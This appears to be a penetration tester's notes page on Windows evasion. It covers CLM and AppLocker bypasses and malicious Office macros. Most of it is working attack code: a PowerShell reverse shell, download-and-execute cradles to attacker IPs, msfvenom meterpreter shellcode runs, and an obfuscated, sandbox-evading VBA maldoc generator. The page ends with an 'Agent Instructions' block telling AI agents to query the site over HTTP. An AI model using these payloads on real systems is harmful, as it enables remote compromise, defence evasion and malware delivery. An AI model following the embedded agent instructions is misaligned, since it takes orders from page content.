# Bypass-Evasion Techniques ## CLM Bypass Detecting, ```powershell PS C:\Users\morph3\Desktop> $ExecutionContext.SessionState.LanguageMode ConstrainedLanguage ``` Idea is very simple, we can abuse `InstallUtil.exe` like below and bypass CLM ```powershell using System; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Configuration.Install; namespace Bypass { class Program { static void Main(string[] args) { Console.WriteLine("Hello from main"); } } [System.ComponentModel.RunInstaller(true)] public class Sample : Installer { public override void Uninstall(System.Collections.IDictionary savedState) { string rev = @"$client = New-Object System.Net.Sockets.TCPClient('192.168.255.255',4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); try { $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; } catch { $error[0].ToString() + $error[0].InvocationInfo.PositionMessage; $sendback2 = ""ERROR: "" + $error[0].ToString() + ""`n`n"" + ""PS "" + (pwd).Path + '> '; } $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); }; $client.Close();"; String cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.255.255/run.ps1') | powershell -noprofile"; Runspace rs = RunspaceFactory.CreateRunspace(); rs.Open(); PowerShell ps = PowerShell.Create(); ps.Runspace = rs; ps.AddScript(cmd); ps.Invoke(); rs.Close(); } } } ``` Build this csharp file above and execute it like below, ``` C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=true /U .\my_clm_bypass.exe ``` Other alternatives, CLM-Rout, * ``` C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /uninstall /logfile= /LogToConsole=false /script="http://192.168.255.255/a.ps1" .\CLMRout.exe ``` PowerShDll, * Downgrade (this probably never works I guess), ```py powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1') ``` PSByPassCLM, * ^ disable amsi bypass ``` #interactice C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /revshell=false /logfile= /LogToConsole=true /U .\psbypassclm.exe #revshell C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /revshell=true /rhost=192.168.49.130 /rport=443 /logfile= /LogToConsole=true /U c:\windows\temp\PsBypassCLM.exe ``` Downgrading (this probably never works I guess), ```py powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1') ``` ## Applocker Bypass * [https://github.com/api0cradle/UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md) ### MSBuild Generate a shellcode like below, ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.255.255 LPORT=9001 -f csharp -e x86/shikata_ga_nai -i 10 > out.cs ``` Replace the shellcode in the template and save it like `something.csproj` ```html ``` Execute the payload ```py C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\something.csproj ``` ### MSHTA ```html ``` `mshta http://192.168.255.255/test.hta` ### XSL ```html ``` `wmic process get brief /format:"http://192.168.255.255/a.xsl` ### DLL `test.cpp` ```cpp #include #include extern "C" __declspec(dllexport) void pwn(void) { OutputDebugString("ExportedFunction"); system("whoami > a.txt"); } BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: OutputDebugString("DLL_PROCESS_ATTACH"); break; case DLL_THREAD_ATTACH: OutputDebugString("DLL_THREAD_ATTACH"); break; case DLL_THREAD_DETACH: OutputDebugString("DLL_THREAD_DETACH"); break; case DLL_PROCESS_DETACH: OutputDebugString("DLL_PROCESS_DETACH"); break; } return TRUE; } ``` `x86_64-w64-mingw32-gcc -shared -o test.dll test.cpp` ``` C:\Windows\System32\rundll32.exe test.dll,pwn C:\Windows\SysWOW64\rundll32.exe test.dll,pwn rundll32 test.dll,pwn ``` ### ADS - Alternate Data Stream foo.js ```javascript var shell = new ActiveXObject("WScript.Shell"); var res = shell.Run("cmd.exe"); ``` ``` C:\Users\morph3\desktop>type foo.js > test.exe C:\Users\morph3\desktop>wscript test.exe:foo.js ``` ## Maldoc ### Rot13 Encoding It randomly select rot iteration ```python import random ceaser_iter = random.randint(2,25) payload = "curl 192.168.49.248/aa" payload = "powershell -ep bypass -c \"curl 192.168.49.248/a|iex\"" print(f"[*] payload: {payload}") print(f"[*] ceaser_iter: {ceaser_iter}") def encrypt_ceaser(s): """ $payload = "winmgmts:" [string]$output = "" $payload.ToCharArray() | %{ [string]$thischar = [byte][char]$_ + 12 if($thischar.Length -eq 1) { $thischar = [string]"00" + $thischar $output += $thischar } elseif($thischar.Length -eq 2) { $thischar = [string]"0" + $thischar $output += $thischar } elseif($thischar.Length -eq 3) { $output += $thischar } } $output """ enc_s = "" for c in s: itered_char = ord(c) + ceaser_iter enc_s += str(itered_char).rjust(3,"0") return enc_s strings = ["Doc1.docm", payload, "winmgmts:", "Win32_Process"] enc_strings = [] for s in strings: enc_strings.append(encrypt_ceaser(s)) for i,j in zip(strings, enc_strings): pass #print(f"{i}:{j}") tpl = f""" Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long Sub Document_Open() MyMacro End Sub Sub AutoOpen() MyMacro End Sub Function Venus(Goats) Venus = Chr(Goats - {ceaser_iter}) End Function Function Mercury(Grapes) Mercury = Left(Grapes, 3) End Function Function Gorgon(Topside) Gorgon = Right(Topside, Len(Topside) - 3) End Function Function Mars(Jupiter) Do Shazam = Shazam + Venus(Mercury(Jupiter)) Jupiter = Gorgon(Jupiter) Loop While Len(Jupiter) > 0 Mars = Shazam End Function Function MyMacro() Dim Earth As String Dim Neptune As String Dim t1 As Date Dim t2 As Date Dim time As Long t1 = Now() Sleep (5000) t2 = Now() time = DateDiff("s", t1, t2) If time < 4.5 Then Exit Function End If If ActiveDocument.Name <> Mars("{enc_strings[0]}") Then Exit Function End If Earth = "{enc_strings[1]}" Neptune = Mars(Earth) GetObject(Mars("{enc_strings[2]}")).Get(Mars("{enc_strings[3]}")).Create Neptune, Tea, Coffee, Napkin End Function """ print(tpl) ``` ### URI to RCE (Follina) * [https://twitter.com/spaceraccoonsec/status/1530902467306606592]() * ### Offensive VBA * Bypasses defender, * ### ShellExecuteA ```vba Option Explicit Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" ( _ ByVal hwnd As Long, _ ByVal lpOperation As String, _ ByVal lpFile As String, _ ByVal lpParameters As String, _ ByVal lpDirectory As String, _ ByVal lpShowCmd As Long) As Long Sub AutoOpen() Call ShellExecute(0, "Open", "cmd", "/c curl 192.168.49.248/xx", "", 1) End Sub Sub Document_Open() Call ShellExecute(0, "Open", "cmd", "/c curl 192.168.49.248/xx", "", 1) End Sub ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.morph3.blog/windows/bypass-evasion-techniques.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.